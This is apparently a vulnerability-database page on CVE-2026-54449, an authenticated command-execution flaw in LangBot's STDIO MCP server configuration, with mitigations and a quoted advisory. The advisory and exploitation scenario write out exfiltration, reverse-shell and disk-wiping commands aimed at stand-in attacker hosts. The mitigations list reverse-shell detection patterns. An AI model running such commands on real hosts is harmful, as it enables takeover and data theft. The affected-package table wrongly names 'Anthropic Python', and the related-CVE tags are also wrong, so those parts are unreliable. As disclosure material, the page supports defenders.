LangBot, an AI agent/chatbot framework with nearly 6,000 downstream dependents, lets any authenticated user register a new 'STDIO' MCP tool server backed by an arbitrary shell command, which the platform then spawns as a subprocess with no sandboxing or input validation — full command execution (CVSS 8.8) behind nothing more than a valid login. There is no CISA KEV listing, EPSS score, or public Nuclei template yet, so mass exploitation isn't confirmed, but the exploit path is trivial: a UI form field, no chained bugs, no payload engineering, and researchers at ox.security have already flagged the underlying MCP StdioServerParameters pattern as a systemic risk across the wider MCP ecosystem, not just LangBot. Because any signed-up user — including a low-privilege trial account or one using stolen credentials — can pivot directly to reverse shells, credential theft, or destructive commands on the host, this behaves like unauthenticated RCE on any LangBot deployment with open registration. No patched version is listed yet (track GHSA-3pvh-63gf-j9mw), so until a fix ships, restrict MCP STDIO configuration to admin-only roles, disable self-service signup on internet-facing instances, and run LangBot in a sandboxed/containerized environment with no outbound network access from the MCP subprocess context. Detection teams should monitor for unexpected child processes spawned by the LangBot service account and for outbound connections initiated shortly after MCP configuration changes.
What is the risk?
High risk. Exploitability is trivial once authenticated — no privilege escalation, chained vulnerability, or specialized AI/ML knowledge is required, only access to the Extensions/MCP UI. Impact is total: full OS command execution as the LangBot service user, enabling data exfiltration, reverse shells, lateral movement, or destructive wipes. Exposure is broad given langbot's 5,901 downstream dependents and the fact that any authenticated tier (including trial/free signups) can trigger the flaw. The absence of a KEV listing or public exploit code lowers immediate mass-exploitation risk, but the low barrier to exploitation and public PoC/video walkthrough mean opportunistic attacks are plausible within days of disclosure.
How does the attack unfold?
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Anthropic Python | pip | <= 4.10.5 | No patch |
Do you use Anthropic Python? You're affected.
How severe is it?
What is the attack surface?
What should I do?
1 step-
Upgrade LangBot beyond 4.10.5 once a patched release is published (monitor GHSA-3pvh-63gf-j9mw for the fix version). Until patched: restrict MCP server configuration (Extensions > MCP > Add) to admin/trusted roles only via RBAC; disable open self-service signup on internet-facing LangBot instances; run LangBot in an isolated container/VM with minimal filesystem access and no direct outbound network egress from the process that executes MCP STDIO commands; audit existing MCP configurations for unexpected commands. For detection, alert on unexpected child processes spawned by the LangBot service account, unusual outbound connections following MCP config changes, and command patterns consistent with reverse shells or data exfiltration (nc, bash -i, curl|sh).
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-54449?
LangBot, an AI agent/chatbot framework with nearly 6,000 downstream dependents, lets any authenticated user register a new 'STDIO' MCP tool server backed by an arbitrary shell command, which the platform then spawns as a subprocess with no sandboxing or input validation — full command execution (CVSS 8.8) behind nothing more than a valid login. There is no CISA KEV listing, EPSS score, or public Nuclei template yet, so mass exploitation isn't confirmed, but the exploit path is trivial: a UI form field, no chained bugs, no payload engineering, and researchers at ox.security have already flagged the underlying MCP StdioServerParameters pattern as a systemic risk across the wider MCP ecosystem, not just LangBot. Because any signed-up user — including a low-privilege trial account or one using stolen credentials — can pivot directly to reverse shells, credential theft, or destructive commands on the host, this behaves like unauthenticated RCE on any LangBot deployment with open registration. No patched version is listed yet (track GHSA-3pvh-63gf-j9mw), so until a fix ships, restrict MCP STDIO configuration to admin-only roles, disable self-service signup on internet-facing instances, and run LangBot in a sandboxed/containerized environment with no outbound network access from the MCP subprocess context. Detection teams should monitor for unexpected child processes spawned by the LangBot service account and for outbound connections initiated shortly after MCP configuration changes.
Is CVE-2026-54449 actively exploited?
No confirmed active exploitation of CVE-2026-54449 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-54449?
Upgrade LangBot beyond 4.10.5 once a patched release is published (monitor GHSA-3pvh-63gf-j9mw for the fix version). Until patched: restrict MCP server configuration (Extensions > MCP > Add) to admin/trusted roles only via RBAC; disable open self-service signup on internet-facing LangBot instances; run LangBot in an isolated container/VM with minimal filesystem access and no direct outbound network egress from the process that executes MCP STDIO commands; audit existing MCP configurations for unexpected commands. For detection, alert on unexpected child processes spawned by the LangBot service account, unusual outbound connections following MCP config changes, and command patterns consistent with reverse shells or data exfiltration (nc, bash -i, curl|sh).
What systems are affected by CVE-2026-54449?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, MCP tool integrations, AI agent orchestration.
What is the CVSS score for CVE-2026-54449?
CVE-2026-54449 has a CVSS v3.1 base score of 8.8 (HIGH).
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0012 Valid Accounts AML.T0050 Command and Scripting Interpreter AML.T0053 AI Agent Tool Invocation AML.T0081 Modify AI Agent Configuration Compliance Controls Affected
What are the technical details?
Original Advisory
### Summary Any authenticated user can achieve arbitrary command execution on the LangBot servers through changing the MCP Server Configuration by added an "STDIO" MCP with an arbitrary command. ### Details The repository uses StdioServerParameters which is based on Anthropic's modelcontextprotocol open source, inside the code - src/langbot/pkg/provider/tools/loaders/mcp.py - StdioServerParameters is imported from mcp, which executes a given command which runs a subprocess on the target machine. Since the LangBot services are authenticated, an attacker finding an open server needs to sign up or login via stolen credentials, then the attacker can use the MCP configuration to enter any arbitrary command, giving the ability to completely take over the machine. ### PoC 1. Open the LangBot server 2. Navigate to Extensions 3. Open the "MCP" tab and press "Add" 4. Choose an STDIO server configuration 5. Add any arbitrary command with arguments <img width="480" height="538" alt="Screenshot 2026-01-19 at 15 08 43" src="https://github.com/user-attachments/assets/c341afa8-68c0-4c34-b5b6-ad8796184bdd" /> Note that an attacker could use this configuration to enter any arbitrary command, including data exfiltration (cat /etc/passwd | nc attacker.com 4444), opening a reverse shell (bash -i >& /dev/tcp/10.0.0.1/8080 0>&1), potentially removing the whole machine's data (rm -rf / --no-preserve-root), and many more. ### Impact This is an authenticated remote code execution vulnerability (RCE), affecting any publicly available LangBot instance, and local instances when in the same network as the attacker (Lateral Movement). CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'). ### Video POC https://github.com/user-attachments/assets/4868d232-7453-442c-bffd-60f0ad4679ea ### Resources https://www.ox.security/blog/the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp/ https://www.ox.security/blog/mcp-supply-chain-advisory-rce-vulnerabilities-across-the-ai-ecosystem/
Exploitation Scenario
An attacker signs up for a free/trial account on a publicly reachable LangBot instance (or reuses stolen credentials). After logging in, they navigate to Extensions > MCP > Add and configure a new STDIO MCP server, entering a command such as `bash -i >& /dev/tcp/attacker-ip/8080 0>&1`. LangBot's provider layer instantiates this via StdioServerParameters and spawns the command as a subprocess on the host, handing the attacker an interactive reverse shell with the privileges of the LangBot service account. From there the attacker can dump credentials/config files, pivot to other services on the same network, or destroy data on the host.
Weaknesses (CWE)
CWE-77 — Improper Neutralization of Special Elements used in a Command ('Command Injection'): The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
- [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
- [Implementation] If possible, ensure that all external commands called from the program are statically created.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H References
Timeline
Related Vulnerabilities
CVE-2026-7574 8.7 Claude Desktop: VM integrity bypass enables RCE
Same package: anthropic CVE-2026-55429 8.7 Coder: cross-workspace agent hijack via app ID reuse
Same package: anthropic CVE-2026-55427 8.3 Coder: SSH config injection via config-ssh enables RCE
Same package: anthropic CVE-2026-55428 8.2 Coder: agent IP spoofing hijacks workspace traffic
Same package: anthropic CVE-2026-45370 7.7 utcp-cli: env leak exfiltrates all agent process secrets
Same package: anthropic